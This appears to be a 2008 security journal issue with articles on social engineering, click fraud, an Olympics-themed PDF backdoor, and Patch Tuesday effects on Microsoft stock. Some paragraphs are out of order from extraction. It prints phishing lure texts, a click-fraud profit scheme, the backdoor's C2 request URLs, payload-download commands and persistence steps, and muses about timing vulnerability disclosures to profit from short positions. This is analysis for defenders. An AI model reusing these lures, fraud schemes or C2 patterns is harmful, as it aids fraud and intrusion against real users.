With the ransomware example in mind, let us now consider a new type of attack, which we can call vandalware. This attack does not carry out vandalism for fun or defiance, but rather for profit. Here is what the criminal would do: first, he or she would select a company to target, and use data-mining techniques to get as much detailed information as possible about vulnerable employees. By vulnerable employee, we mean an employee with access to sensitive data or access to the web page faade of the company. From the vulnerable employee, a vandal might learn about the internal structure of the company, the names of key employees, and the format of email addresses. second, the criminal would buy put options for that company. (We are assuming that it is a publicly traded company.) a put option is a financial instrument that increases in value if the corresponding stock falls in price; investors and speculators use put options to turn a profit from an insight that a given stock is soon to lose value. Most likely, other investors, not just the criminal, would also buy put options, especially if the stock of the targeted company has a reasonable trading volume. Third, the criminal would unleash an attack against the company, perhaps by sending selected employees spoofed email appearing to come from another employee, such as their boss: Hi jim. Please take a look at the attached PowerPoint slides and let me know what you think. If possible, Id like a quick assessment by tomorrow morning. Hope you can make it. or perhaps from a system administrator: There is a dangerous new computer virus, and our systems are not properly patched yet to defend against it. Please install the attached program on your computer right away to help us stay secure. Do this as soon as you can.
BBB complaint case
BBB CASE #569822971

Complaint filed by: Michael Taylor Complaint filed against: Complaint status: Category: Contract Issues Case opened date: 2/28/2008 Case closed date: Business Name: Contact: BBB Member:
*** Attached you will find a copy of the complaint. Please download and keep this copy so you can print it for your records.*** On February 26 2008, the consumer provided the following information: (The consumer indicated he/she DID NOT received any response from the business.) The form you used to register this complaint is designed to improve public access to the Better Business Bureau of Consumer Protection Consumer Response Center, and is voluntary. Through this form, consumers may electronically register a complaint with the BBB. Under the Paperwork Reduction Act, as amended, an agency may conduct or sponsor, and a person is not required to respond to, a collection of information unless it displays a currently valid OMB control number. That number is 502-793. 2008 BBB.org, All Rights Reserved. <Complaint_569822971.doc>
Figure 1: The Better Business Bureau scam. The email contains an infected attachment, which the attacker hopes will be opened by the recipient.
14
(when the competitors are the advertisers from whom money is transferred). often, criminals generate traffic in an automated manner, making it appear as though real people viewed the ads. automation can include some form of malware, such as a botnet. another common approach is for criminals to hire people to click on selected ads; this is referred to as a click farm. We will now describe how social engineering can be used in a new kind of click fraud attack. First, well begin by explaining a common scenario that is not click fraud:
Scenario 1 standard web site. consider a legitimate web site that provides some service, and that displays advertisements which relate to this service. The contents of the ads are typically determined in an automated manner by the ad portals (for example, google and Yahoo) by automatically reviewing the contents of the web site and selecting ads on topics related to the contents. If the web site is devoted to cooking, for example, then the ads may relate to pots, pans, and coffee machines. These sites also commonly place ads that bring in traffic. Thus we would expect to see ads that use keywords such as knife, calphalon, Teflon, and similar terms. There is nothing unusual about this type of site. Scenario 2 Using arbitrage. consider now a second web site that has content which selects ads corresponding to the keywords find a attorney. (We do mean a, not an. Well explain why soon.) The site can do this by having lots of text (whether visible or not) that repeats this phrase. at the time of writing this article, the cost for this type of strategy falls in the range of $1.07 to $7.05 per keyword. The exact price depends on the venue, the time of the day, and, of course, the competing bids for the keywords because all keyword prices are established by auctions. Thus, if a user clicks on an ad on this site, the owner of the corresponding ad would pay that amount to the portal, which in turn would transfer the amountminus commissionto the web site that displayed the ad. next, imagine that the site in question places an advertisement using the keyword find an attorney. The only difference here is the articlea versus an. The price range for this keyword is $0.87 to $3.82. We will assume that the web site pays $2.00 for each visitor it brings in, and receives $4.00 for each visitor who clicks an ad on the site. as long as 50 percent of the visitors who arrive via the $2.00 ad click on a $4.00 ad, then the site makes a profit, without providing any service. This is referred to as keyword arbitrage. It is not quite click fraud, but its close, as we shall see.
634 people coming to his site clicks on the mesothelioma ad, he makes a profit. But why would someone do that? assume that the web site content is an article, apparently written by a medical doctor, asking Did you know that 10 percent of asthma sufferers are at risk to contract mesothelioma? although this is not a truthful statement, it will make many people who are concerned with asthma and who are unaware of what mesothelioma is to do exactly what the criminal wantsto click. Will half of all visitors fall for it? With a thousand visitors per day, that means a daily profit of more than $30,000. Even with less conspicuous keywords, the criminal can still make a pretty decent profit. What makes the three scenarios differ is the intentand the use of social engineering. From the ad providers perspective, these three scenarios are very similar in structure. a visitor comes in, reads content, and clicks an ad. although it is possible to match keywords coming in and going out to find anomalies, it is also possible for criminals to use one service provider to bring traffic in, and another one to carry traffic out. This strategy makes it hard to detect and stop this kind of attack, especially if it is carried out at small scale using a large number of sites.
conclusion
social engineering on the Internet is here to stay. We have already witnessed its effects through phishing scams, and we are starting to see how criminals use social engineering to improve the efficiency of spam and crimeware. Even more skilled applications than we currently see are just around the corner, we fear, as is the use of social engineering for other types of fraudsuch as click fraud. We can design technical countermeasures with this in mind, and understanding the ways attacks are likely to occur will help improve the defenses. But we must also understand that our strategy requires better user interfaces, better procedures, stronger legislation, and improved education. The good guys still have a lot of work to do.
Scenario 3 an attack using social engineering. now well see how a criminal might use social engineering and extend the arbitrage technique to make a spectacular profit. lets assume that the criminal produces a web site that generates the keyword mesothelioma (a rare form of cancer caused by asbestos exposure). as we write, this is a google keyword worth $63.42. The criminal buys traffic for the keyword asthma ($0.10) to bring visitors to his site. If at least one
Dr. Markus Jakobsson is a Principal scientist at Palo alto research center. He researches phishing and countermeasures, click fraud, the human factor in security, cryptography, network security, and protocol design. He is an editor of Phishing and Countermeasures (Wiley, 2006) and co-author of Crimeware: Understanding New Attacks and Defenses (symantec Press, 2008).
Image courtesy of Parc, photographer Brian Tramontana
Fall 2008
15
a Prime Target for social Engineering Malware

By Elodie Grandjean
Malware writers often use social engineering methods to directly infect a system or host, or to start a cascade of downloading and executing malware.
Most of us have received an email containing a malicious attachment or Url while reading about an important security update or a long-lost friend who wants to re-establish contact. Dont be fooled into thinking that email is the only attack vector for spreading malware via social engineering tricks. There are plenty of other ruses, including using popular instant messaging services. a friends compromised system might send you a message with a Url pointing to a file and asking you to look at some pictures. The problem is you trust the contact and are unaware that the other system is infected. In many cases, the Url points to malware. other malware uses social engineering to steal confidential information such as login credentials, credit card numbers, and so on. These techniques are typically used in phishing attacks or server intrusions. The most common social engineering tricks malware writers use are for adult services. Heres a list of others, though its hardly exhaustive:

Threatening emails, mentioning jail sanctions or jury-duty procedures Free games and screensavers containing a Trojan, or free antispyware tools, which are often rogue programs themselves Big events, such as sports, extreme weather disaster, or urgent news celebrity names and reports on their adventures and misbehavior Potentially trusted or secret relationships such as affiliation with social networking web sites, fake friends, school classmates or relatives, and secret lovers
Pornographic links and images Using a female name in the sender field Political agendas, including solicitations for contributions in the name of a popular candidate Fake emails for banks, online payment services, and other financial services. These request a confirmation or an update of login credentials or credit card information.
The list of topics is potentially limitless and theres plenty of appeal to large groups of global users. The list also highlights the fact that social engineering can often target national or even local groups of users. For example, a global attack referencing a popular social networking web site may bring responses from around the world to the malware author; on the other hand, a similar attack on the U.s. presidential election will likely ensnare only american victims.
16
Why Pick on the olympics?

china has been in the spotlight for months due to the 2008 olympic games in Beijing. Media interest has been huge, covering athletes, fans, infrastructure, environment, and politics, among other topics. on the political front, protests over the status of Tibet have been a highly sensitive topic; many Free Tibet organizations around the world have benefited from the olympics spotlight. other issues, regarding the slave labor and human rights, have also raised their profile. and many Internet users are interested enough to read news and other stories online. The olympic torch became a hot symbol for protesters in the run-up to the games. The torchs travel around the world created huge media coverage and developed even more interest and involvement among both fans and opponents. This growing interest also increased the size of the potential attack area that malware writers could exploit.
Using the Olympic Games as the social engineering focus allowed the malware authors to target many sports enthusiasts, as well as all the previously targeted people who were interested in the TibetChina conflict.
sampling Victims
a social engineering attack usually needs to sample its victims beforehand in order to succeed. lets see who the potential victims are of an attack using the china-Tibet conflict or the olympic games as a lure. Weve already seen individuals from pro-Tibet groups receive emails containing a cHM (compiled help files), PDF, PPT, Xls, or Doc attachment related to the Tibet situation, china in general, or the olympics. all of these emails appeared to have been sent from a trusted organization or person. Its likely these users were accustomed to receiving such documents from their supporters and were perhaps not very vigilant. These particular attachments were malicious: they used various Microsoft complied HTMl Help, adobe acrobat, Microsoft Excel, Microsoft PowerPoint, or Microsoft Word vulnerabilities to drop and silently execute embedded executable files. at this point the targeted attack area was relatively small, but the media coverage of Tibet protests helped to ignite the fuse. later we witnessed some legitimate web sites devoted to supporting Tibet were hacked to embed the Fribet Trojan,1 which can download itself onto visitors machines by exploiting vulnerabilities in web browsers.
at this point, the victim base increased from targeted organizations and their supporters to anyone curious about conditions in Tibet. again, media attention aided this growth in the vulnerable population. next, malware writers took advantage of the olympic games themselves to propagate social engineering attacks with the appearance of the pro-Tibet rootkit.2 This malicious set of files operated under cover of a movie file ridiculing the efforts of a chinese gymnast; while the cartoon runs, several malicious files silently drop and a rootkit is installed on the victims computer to hide them. Using the olympic games as the social engineering focus allowed the malware authors to target many sports enthusiasts, as well as all the previously targeted people who were interested in the Tibet-china conflict.
Fall 2008
17
case study: an olympics Malware attack

We recently received the PDF file declaration_olympic_games_ eng.pdf, which was initially emailed to a pro-Tibet group. (see Figure 1.) This document seemed innocent because when the application opened, this text appeared and nothing crashed or immediately went awry. Thus, most people did not suspect any malicious activity. However, in the background, some malicious files were silently created on the victims machines. lets see exactly how the attack works. In fact declaration_olympic_games_eng.pdf is an empty PDF file that exploits a vulnerability in acrobat to drop and execute the first part of the malicious package. This malicious executable file (detected as BackDoor-DoW3) is embedded in an encrypted form at the following location shown in the hex editor in Figure 2 (next page). Figure 3 (next page) shows the first bytes of the embedded file once decrypted. This executable file drops the legitimate PDF file book.pdf, which is displayed when we execute the first file. The dropper file looks for the process AcroRd32.exe in the list of the active processes,
finds the directory where acrobat is installed, and then opens book.pdf. Figure 4, next page, shows the code in the dropper file that is responsible for this action. The malware also drops another executable file, book.exe, which copies itself under %ALLUSERSPROFILE%\Application Data\ msmsgs.exe and creates a new Windows service.4 This new service goes by the service and display name logical Disk Manager service and ensures that Windows will automatically run the Trojan at start-up. The malware even has a Plan B for hooking the startup process: If it fails to create the service, it will add a new registry entry, Windows Media Player, which points to msmsgs.exe. Windows Media Player is added to the following start-up key in the Windows registry5: HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\Run. The Trojan also creates two files containing some encrypted data:

C:\WINDOWS\jwiev.log.bak C:\WINDOWS\clocks.avi.bak
Sponsors declaration of responsibility at the 2008 Beijing Olympic Games

WITH REFERENCE TO, and consistent with, our obligations under the Olympic Charter, the undersigned sponsor of the 2008 Beijing Olympic Games hereby declares: We reaffirm our commitment to the harmonious development of man, with a view to promoting a peaceful society concerned with the preservation of human dignity, as set forth in the Olympic Charter, and We acknowledge that sponsorship of the Olympic Games carries certain responsibilities, including the responsibility of implementing our sponsorship and communications programs in a manner that promotes awareness of basic human rights such as the right to free speech, and We are fully aware of the assurance made by the government of the Peoples Republic of China to the Olympic Committee to improve its human rights record as a condition for hosting the Olympic Games and recognize the worldwid concerns expressed about Chinas human rights record. IN FURTHERANCE TO THE ABOVE, we agree to demonstrate our commitment to human rights at the 2008 Beijing Olympics by: FIRST, making bona fide good faith efforts to raise the issue of human rights with our Chinese contacts and to publicly report on our efforts to do so, and SECOND, designating a high-level executive within our organization to monitor every aspect of our activities associated with the Olympics and to assure that our actions properly reflect our commitment to human dignity and human rights, and THIRD, establishing a fund through which contributions can be made to prisoners of conscience in China, and their families, as well as to those persecuted in connection with the 2008 Olympic Games, and FOURTH, presenting a corporate resolution to our Board of Directors resolving to adopt this Declaration, and the principles of human rights and human dignity upon which it is based, prior to the commencemento of the 2008 Olympic Games in Beijing, and FIFTH, incorporating this Declaration of Responsibility into our commercial messages. DECLARED BY
Figure 1: Pro-Tibet supporters recently received this apparently legitimate file as an email attachment.
Name/Title Date
18
Finally book.exe cleans up by creating a batch file that deletes itself and self-terminates. From that point, the baton is passed to msmsgs.exe to take over. Msmsgs.exe temporarily drops another file at the following location: C:\Program Files\WindowsUpdate\Windows Installer.exe. just before being deleted, Windows Installer.exe drops two copies of a Dll file into:

The malicious code injected into svchost.exe calls the workFunc() function from avp01.lic, which connects to a remote server and sends three requests:
http://www1.palms[removed]/ld/v2/loginv2.asp?hi=2wsdf351 &x=0720080510150323662070000000&y=192.168.1.122&t 1=ne http://www1.palms[removed]/ld/v2/votev2.asp?a=7351ws2&s= 0720080510150323662070000000&t1=ne http://www1.palms[removed]/ld/v2/logoutv2.asp?p=s9wlf1&s= 0720080510150323662070000000&t1=ne
C:\Documents and Settings\All Users\DRM\drmv021.lic C:\Documents and Settings\All Users\DRM\avp01.lic
The malware injects itself into svchost.exe to hide its activity. It launches a new instance of svchost.exe (the legitimate system process6), allocates a block of memory within the address space of this new process, writes a copy of itself into the virtual address space of svchost.exe (at the address 0x400000), and runs the malicious code by creating a remote thread.
The x and y parameters may differ. The value of x is formed by concatenating 07 with the exact date (2008/05/10) and time (15:03:23) the file clocks.avi.bak was created, and then by ending with the hard-coded string 662070000000. The value of y is the IP address of the victims computer.
Figure 2: This malicious PDF carried an encrypted copy of the malware BackDoor-DOW. Figure 4: The malware looks for Acrobat Reader (AcroRd32.exe) and then opens the innocent file book.pdf.
Figure 3: The unencrypted version of BackDoor-DOW.
Fall 2008
19
The three server-side scripts loginv2.asp, votev2.asp, and logoutv2.asp inform the attacker that a new compromised machine is available to check if a command has been sent from the attacker and to stop the backdoor, respectively. To read the response sent after connecting to one of the server-side scripts, the Trojan creates a copy of the returned web page in the following folder: C:\Program Files\InstallShield Installation Information\ The filename consists of a six-digit random value and, once read, the file is deleted. loginv2.asp and logoutv2.asp return only blank web pages (with <html><head></head></html> tags), but votev2.asp returns either code that roughly means The backdoor is ready but there is no action needed at the moment (@n4@300@) or a command such as one of the following:
This malware trend may spread in the upcoming months. It is a serious concern because most people trust security vendors; if that trust were lost, many users would be even more likely to suffer.
rogue software and sites

creative hooks for social engineering attacks are not limited to sporting events. For several months, we have noticed an increase in malicious software posing as applications from security vendors. These programs lure victims into infecting their computers by appearing to be helpful. several variants of the Fakealert7 Trojan warn their victims that their machines are infected (dont you love the irony!) and provide information (often malicious Urls) for retrieving anti-spyware tools, which are in fact rogue applications themselves. given the importance of keeping your software current, it wasnt long before rogue update web sites began to imitate the real Windows Update site. We recently discovered a sophisticated method using Dll componentslinked to a fake Windows Update sitethat prevented Internet Explorer from warning users when a remote web server used an invalid certificate for a secure (HTTPs) web site. The purpose of this attack was to disguise malicious files as real Windows updates that victims would download and execute. This malware trend may spread in the upcoming months. It is a serious concern because most people trust security vendors; if that trust were lost, many users would be even more likely to suffer.
@n11@http://www1.palms[removed]/ld/v2/sy64. jpg@%SystemRoot%\Dnservice.exe@218c663bea3723a3dc9d 302f7a58aeb1@ @n11@http://www1.palms[removed]/ld/v2/200764.jpg @% SystemRoot%\Soundmax.exe@5f3c02fd4264f3eaf3ceebfe94f fd48c@.
Either command roughly means download the aforementioned file with the .jPg extension and drop it in the %SysDir% folder on the victims machine by using the provided executable filename. The last part of the response is the md5 hash of the file that is going to be downloaded (and that will be used to check the files integrity). During this entire process, victims are none the wiser about what is happening in the background. While they read and fill in the declaration that has been dropped by the malicious PDF file, the backdoor is silently installed on their computers, waiting for commands from the attacker. at this point, any other malicious files can be downloaded on the machine as well, as it is fully compromised.
20
conclusion
sporting events are frequently used as bait for social engineering attacks. That malware developers would turn their attention to the Beijing olympics was easy to foresee. The event offered all the ingredients for a perfect recipe: small targeted attacks grew larger in scope as the number of victims interested in the topic increased. This growth was possible due to closely related issuesconcern over Tibet led to the global torch relay, which led to the olympics themselves. The media often plays an important role in increasing the popularity of an event. Their efforts lead some victims to search for further information, but they often stumble onto related but malicious web sites or, more commonly, legitimate web sites that are compromised and silently infect unsuspecting visitors. These attacks are so elaborate that the victims will probably not suspect anything. as we learned from the case study, we face threats not only from unknown senders and email attachments with an .exe extension. legitimate documents (Microsoft Word, Microsoft Excel, Microsoft PowerPoint, and others) can also be malicious. It is partly because of the naive belief that data files cannot hold malware that these attacks are so successful. Ultimately, people tend to be more aware of common tricks, which in turn forces attackers to become more creative and nefarious in their techniques to remain victorious over their victims.
Elodie Grandjean has been working as a Virus researcher for Mcafee avert labs in France since january 2005. she has more than five years of experience in reverse engineering on Windows platforms. grandjean specializes in anti-reverseengineering techniques, unpacking, and decryption, and has written for French security magazine MISC: Multi-System & Internet Security Cookbook. When she is not analyzing malware or programming, grandjean is probably browsing the Internet, unless she is attending a live concert or enjoying a Belgian beer in a pub with her friends.
ENDNOTES
1 Fribet, Mcafee VIl. http://vil.nai.com/vil/content/v_144356.htm 2 Is Malware Writing the next olympic Event? Mcafee avert labs Blog. http:// www.avertlabs.com/research/blog/index.php/2008/04/14/is-malware-writingthe-next-olympic-event/ 3 BackDoor-DoW, Mcafee VIl. http://vil.nai.com/vil/content/v_144476.htm 4 services, Microsoft Developer network. http://msdn.microsoft.com/en-us/ library/ms685141(Vs.85).aspx 5 registry, Microsoft Developer network. http://msdn.microsoft.com/en-us/ library/ms724871(Vs.85).aspx 6 a description of svchost.exe in Windows XP Professional Edition, Microsoft Help and support. http://support.microsoft.com/kb/314056/en-us 7 Fakealert-B, Mcafee VIl. http://vil.nai.com/vil/content/v_139058.htm Fakealert-c. http://vil.nai.com/vil/content/v_139219.htm Fakealert-D. http://vil.nai.com/vil/content/v_140346.htm Fakealert-D!56c05f7f. http://vil.nai.com/vil/content/v_142850.htm Fakealert-H. http://vil.nai.com/vil/content/v_141377.htm Fakealert-I. http://vil.nai.com/vil/content/v_141466.htm Fakealert-g. http://vil.nai.com/vil/content/v_141163.htm Fakealert-M. http://vil.nai.com/vil/content/v_142807.htm Fakealert-Q. http://vil.nai.com/vil/content/v_143088.htm Fakealert-r. http://vil.nai.com/vil/content/v_143102.htm Fakealert-s.dll. http://vil.nai.com/vil/content/v_143110.htm Fakealert-T. http://vil.nai.com/vil/content/v_143406.htm generic Fakealert.a. http://vil.nai.com/vil/content/v_143470.htm
Fall 2008
21
Vulnerabilities in the Equities Markets

By Anthony Bettini
The recent credit turmoil in the equities and derivatives markets has put significant focus on many facets of the financial industry not limited to regulatory control structures, ratings agencies, hedge funds, private equity, pension funds, and other market makers.
With this constant media attention, people in related sciences (such as bioinformatics, computer scientists, etc.) are beginning to take a closer look at financial engineering. With our background in vulnerability research and given the context of the media emphasis on the credit crisis, its natural to look for vulnerabilities in the equities and derivatives markets. at the 2007 Black Hat Usa conference, Matasano security looked at the Financial Information eXchange (FIX) protocol, which forms the underpinning for the message passing between investment managers executing many trades on behalf of clients and broker and dealers.1 2 Matasanos related research asks questions such as What vulnerabilities may be present in the FIX protocol? This was an interesting look at financial protocols from a security weakness standpoint. However, our article will take a different tack: we are more concerned with the financial and social engineering rather than the vulnerability aspect. our research begins with the follow questions:

are social engineering events involving vulnerabilities and equities occurring today? could there be even more such events in the future?
as this is a broad topic of study, lets begin by analyzing only vulnerabilities in Microsoft products. In the near future, we expect to complete some complementary data with other software developers, as well as a comparison of the economics of patch distribution methods (for example, Microsofts monthly release versus oracles quarterly release versus other vendors as-needed release schedules).
The Hypothesis
Patch Tuesday is the second Tuesday in the month. Its the one day of each month when Microsoft releases primarily security and functional updates for Windows and its other applications. our hypothesis is that on Patch Tuesday, there is downward pressure on the price of Microsoft stock (ticker name: MsFT). This pressure is likely due to reactions to news articles about the negative implications of security vulnerabilities in Microsoft software. similarly, there is probably an uptick the following day, Wednesday, when people realize that Microsoft stock was oversold the prior day.
What are the stock price implications of Microsofts Patch Tuesday? What about the day before Patch Tuesday? What about the day after Patch Tuesday (sometimes called Exploit Wednesday)? What about advance notification Thursday? What about zero-day threats? Do investors even notice these events?
Are People Making Money from Patch Tuesday?

It would seem so. at the very least, it appears that there is a correlation between Microsoft stock price fluctuations and the Patch Tuesday release cycle. For instance, consider Figure 1 (next page).
22
The first row, Full-year average, is our baseline average of the difference between Microsofts stock price at the opening of trading versus their price at the close of the day. Included as an alternative baseline is the non-event days average, which excludes events such as advance notification and Patch Tuesday. It would appear that when Microsoft issues an advance notification, on average the price has stronger-than-average downward momentum. similarly, on an average Patch Tuesday, there is strongerthan-average downward momentum. Even more interesting is that on Exploit Wednesday (the day after Patch Tuesday), there is, on average, an uptick or net-positive close. This is probably because institutional investors or market makers feel Microsoft was oversold the day before because of the bad news and that, in reality, Microsofts value as an investment was only negligibly affected. note that this trend has been consistent during the past
three years and continues today. although the open-to-close is probably easiest to understand, the trends can be seen in the average open-to-high (price of the day) and average open-to-low as well; although, in some cases, this effect is less strong. In Figure 2 we see that generally the average intraday high on an advance notification day and a Patch Tuesday are lower than the average intraday high for the year. We also see that the average intraday high on a day following a Patch Tuesday is generally higherpointing to stronger upward pressures. In Figure 3 we discover that the average intraday low on a Patch Tuesday is generally lower than the average intraday low for the full year. However, for an advance notification day, the results are more mixed. also relevant is that the average intraday low on a day following a Patch Tuesday is usually higher than the full year average, pointing to stronger upward pressures.
Microsoft stock price change from the days open to close
Microsoft open to intraday low
MSFT CHANGE FROM OPEN TO CLOSE
2008
2007
2006
MSFT CHANGE FROM OPEN TO LOW
2008
2007
2006
Full-year average Non-event days Advance Notification Patch Tuesday Every Tuesday Tuesday, but not Patch Tuesday Day after Patch Tuesday Every Wednesday Wednesday, but not day after Patch Tuesday
-0.17% -0.20% -0.43% -0.45% 0.16% 0.37% 0.49% -0.18% -0.40%
0.06% 0.07% -0.12% -0.29% 0.05% 0.15% 0.21% 0.44% 0.51%
0.08% 0.08% -0.08% -0.11% -0.03% -0.01% 0.27% 0.29% 0.26%
-1.35% -1.39% -1.24% -1.58% -1.16% -1.01% -0.91% -1.39% -1.56%
-0.89% -0.90% -1.24% -0.99% -0.81% -0.76% -0.74% -0.78% -0.79%
-0.64% -0.64% -0.36% -0.93% -0.74% -0.68% -0.47% -0.51% -0.54%
Figure 1: Examining the change in Microsofts stock price on key days shows a consistent three-year trend. Microsoft open to intraday high
Figure 3: Patch Tuesday retains its low position when compared with the average intraday low for the year.
MSFT CHANGE FROM OPEN TO HIGH
2008
2007
2006
1.28% 1.34% 0.93% 0.92% 1.35% 1.50% 1.52% 1.25% 1.17%
0.97% 0.95% 1.08% 0.98% 1.01% 1.02% 1.30% 1.24% 1.23%
0.88% 0.88% 0.58% 0.67% 0.92% 0.99% 0.70% 0.92% 0.95%
Figure 2: In intraday trading Advanced Notification days and Patch Tuesdays deliver consistently lower stock price averages compared with other days of the year. Fall 2008 23
a word of caution for the casual day trader or retail investor: these price fluctuations are relatively small and tightly time constrained. Profiting at a retail level from such trades would require risking a large amount of capital. a further word of caution is that the data set depicted is relatively small and, thus, by nature, of relatively low quality. For instance, there are only about 260 trading days per year, of which only 12 fall on a Patch Tuesday. although the data set and fluctuations are small, this level of correlation is likely to be interesting only to institutional investors and should be modeled appropriately. now lets look at some comparative potential profit spreads in Figure 4. In Figure 4 it appears that purchasing near the average intraday low on a Patch Tuesday and then selling near the average intraday high on the next day would yield a small profit (until this trade becomes more common, resulting in the dampening of the effect). The profit spreads shown above focus on actual vulnerability disclosures that occur based on the assumption that other people work in a predictable manner. However, just as rumors of a hostile takeover impact the price of a stock, the rumor of several critical defects putting consumers at risk could do so as well.
consider that fake vulnerability disclosures and rumors already appear today on mailing lists such as Full Disclosure or on Irc chat rooms. Its possible that events could be orchestrated via social engineering to manipulate the market and its participants. This scenario would clearly be illegal; but where there is profit, there are often people willing to break laws. similarly, as we will see later, not all attacks would involve social engineering. some may even be legal. situations such as theseshort-term market predictability yielding to profitsat least according to the Efficient Market Hypothesis (EMH) and the random Walk Hypothesis are unlikely to exist, and are certainly not likely to persist.3 4 as such, we caution readers, as all financial entities should, and state that past performance does not necessarily indicate future results.5
leveraging share Volume as an Indicator

another working theory we had was that the Patch Tuesday cycle had dampened the effect of negative press that would have been seen during the days of unscheduled bulletin releases (prior to mid-october 2003). a cursory glance at the volume of shares indicator appears to support this theory. (see Figure 5, next page.)
Potential profit spreads
SPREADS
2008
2007
2006
Intraday low Full year (intraday low) to full year (intraday high) Patch Tuesday (intraday low) to Patch Tuesday (intraday high) Patch Tuesday (intraday low) to day after Patch Tuesday (intraday high) -1.35% -1.58% -1.58%
Intraday high 1.28% 0.92% 1.52%
Intraday low -0.89% -0.99% -0.99%
Intraday high 0.97% 0.98% 1.30%
Intraday low -0.64% -0.93% -0.93%
Intraday high 0.88% 0.67% 0.70%
Figure 4: Buying stock on a Patch Tuesday and selling it the next day can apparently offer a legitimate profit, but only when trading in large quantities and with considerable risk.
24
Microsoft volumes, 2002 03
MSFT VOLUME DIFFERENTIALS (UNSCHEDULED)
2003
2002
Average volume, full year (in shares traded per day) Average volume, full year (non-event) Average volume, day of unscheduled bulletin Average difference in volume Average difference in volume relative to non-events
65,074,644 64,512,432 70,017,743 7.60% 8.53%
76,903,678 76,503,325 78,796,255 2.46% 3.00%
Figure 5: Microsofts trade volume before its move from unscheduled bulletins to Patch Tuesday.
Patch Tuesday releases
MSFT VOLUME DIFFERENTIALS (SCHEDULED)
2008
2007
2006
2005
2004
Average volume, full year Average volume, full year (non-event) Average volume, day of Patch Tuesday Average volume Tuesday, but not Patch Tuesday Average MSFT difference in volume (Patch Tuesday to full year) Average MSFT difference in volume (Patch Tuesday to non-events) Average ÎXIC volume, full year Average ÎXIC volume, full year (non-events) Average ÎXIC volume on Patch Tuesday Average ÎXIC volume on Tuesday, but not Patch Tuesday Average ÎXIC difference in volume (Patch Tuesday to full year) Average ÎXIC difference in volume (Patch Tuesday to non-events) Difference in MSFT Patch Tuesday vs. MSFT non-Patch Tuesday Tuesday Difference in ÎXIC Patch Tuesday vs. ÎXIC non-Patch Tuesday Tuesday
84,898,274 86,738,696 75,584,620 79,818,571 -10.97% -12.86%
62,506,437 64,210,868 57,840,233 59,305,574 -7.47% -9.92%
67,074,387 68,753,419 63,786,108 64,967,877 -4.90% -7.22%
66,612,503 67,227,483 65,453,142 69,691,473 -1.74% -2.64%
66,793,733 67,260,018 65,439,875 66,471,610 -2.03% -2.71%
2,249,267,340 2,089,534,502 1,926,859,522 1,731,835,794 1,769,480,040 2,271,900,270 2,094,466,552 1,935,854,692 1,732,949,769 1,768,463,981 2,161,318,000 2,054,922,500 2,009,946,667 1,745,967,500 1,759,816,667 2,249,947,143 2,107,280,909 1,813,831,818 1,658,301,818 1,752,408,182 -3.91% -4.87% -5.30% -3.94% -1.66% -1.89% -2.47% -2.48% 4.31% 3.83% -1.82% 10.81% 0.82% 0.75% -6.08% 5.29% -0.55% -0.49% -1.55% 0.42%
Figure 6: Instituting Patch Tuesday has apparently convinced traders that theres no advantage to be gained solely from Patch Tuesday events.
Fall 2008
25
In Figure 5 (page 25) we see that on the day of release of an unscheduled bulletin in 2003 and 2002, the average volume of shares traded outpaced the average volume for the year, by 7.6 percent and 2.46 percent, respectively, on average. When comparing only non-event days for the average volume for the full year, this figure jumps to 8.53 percent and 3 percent, respectively. This contrasts, quite sharply, with the volume differentials of the more predictable Patch Tuesday releases, shown in Figure 6 (page 25). Weve also included a comparison between Microsoft (MsFT) and the nasDaQ composite Index (ÎXIc). This would imply the effect of changing from unscheduled (random walk) to prescheduled (Patch Tuesday) bulletins has dropped the interest level among traders for events associated with Patch Tuesday. next lets look at the comparison data for advance notification (see Figure 7, below). Why is the average volume lower on Patch Tuesday and advance notification day? our hypothesis is that the full-year average volume compared with the average Patch Tuesday volume can be explained due to significantly large events affecting the full-year average (from martingale probability theory) that are statistically less likely to occur on a Patch Tuesday because of its infrequency (just 12 times per year).6
It is possible people are already using zeroday threats for financial gain, not simply for embedding them within password-stealing Trojans but for taking short or options positions in equities and derivatives.
Press releases, reactions, and Implications

The implications of this are interesting, and we hope this article will spur a fresh round of research on the influence of vulnerabilities and threats on the securities markets. For instance, consider the Emulex hoax.7 In this case, someone posted a fake press release about the cEos departure, which resulted in a 62 percent drop in intraday trading of Emulex stock. The person posting the fake release had taken a large short position in the stock and profited more than Us$250,000. This was a clear case of fraud. similarly, there are periodic cases in the news about insider trading (also clearly illegal).
Advance notification
MSFT VOLUME DIFFERENTIALS (ADVANCE NOTIFICATION)
2008
2007
2006
Average volume, full year Average volume, full year (non-event) Average volume, day of Advance Notification Average difference in volume Average difference in volume relative to non-events Average ÎXIC volume, full year Average ÎXIC volume, full year (non-event) Average ÎXIC volume on Advance Notification
84898274 86738696 82848700 -2.41% -4.48% 2249267340 2271900270 2221380000
62506437 64210868 61532042 -1.56% -4.17% 2089534502 2094466552 2224365833
67074387 68753419 54484850 -18.77% -20.75% 1926859522 1935854692 1872442500
Figure 7: On average, fewer Microsoft shares are traded on Patch Tuesday and Advanced Notification days.
I am not sure I highlighted the correct information on this chart.
26
However, if stock price fluctuations occur due to vulnerability and patch announcements, what would happen if a person built up a short position in a major software company and posted a handful of vulnerabilities with exploits to the Full Disclosure mailing list? Perhaps something like the Month-of-Browser-Bugs, but targeted at one vendor, on one day? If this happened during market hours and during a day that was less likely to have competing news that could distract investors (say a Tuesday or a Thursday), then the downward pressures on the stock could be significant at a consumer level. It would also clearly be illegal if the vulnerabilities were not real (perhaps libel or fraud). However, if they were real, would it be illegal? reporting the truth, albeit in a potentially manipulative fashion, may or may not be considered social engineering or even illegal. Perhaps the legality could be argued either way, but consider the Firestone and Ford tire controversy.8 If you had driven a Ford car at the time, had tire problems, and shorted the stock, would that have been legal? certainly. If you had shorted the stock, and then told Firestone, Ford, or others, would that have been legal? as with any attack vector or vulnerability, awareness and disclosure often improve the security posture of those who can resolve the problem. By openly talking about weaknesses, perhaps we can improve and appropriately monitor the system. It is possible people are already using zero-day threats for financial gain, not simply for embedding them within password-stealing Trojans but for taking short or options positions in equities and derivatives. Its clear that spammers have figured out ways to profit from securities markets: we have received lots of penny-stock spam.
conclusion
There is still a great deal of work to do in the area of vulnerability and threat implications to the equities and derivatives markets. Weve primarily focused on the equities markets. The derivatives markets often move in the same direction but with amplified volatility. given some confidence level in the direction of a move, it would probably make sense for traders who publish vulnerabilities to time that publication with options expiration dates. I would like to thank my colleagues Craig Schmugar and Eugene Tsyrklevich for reviewing this paper and data set, as well as for providing feedback.A.B.
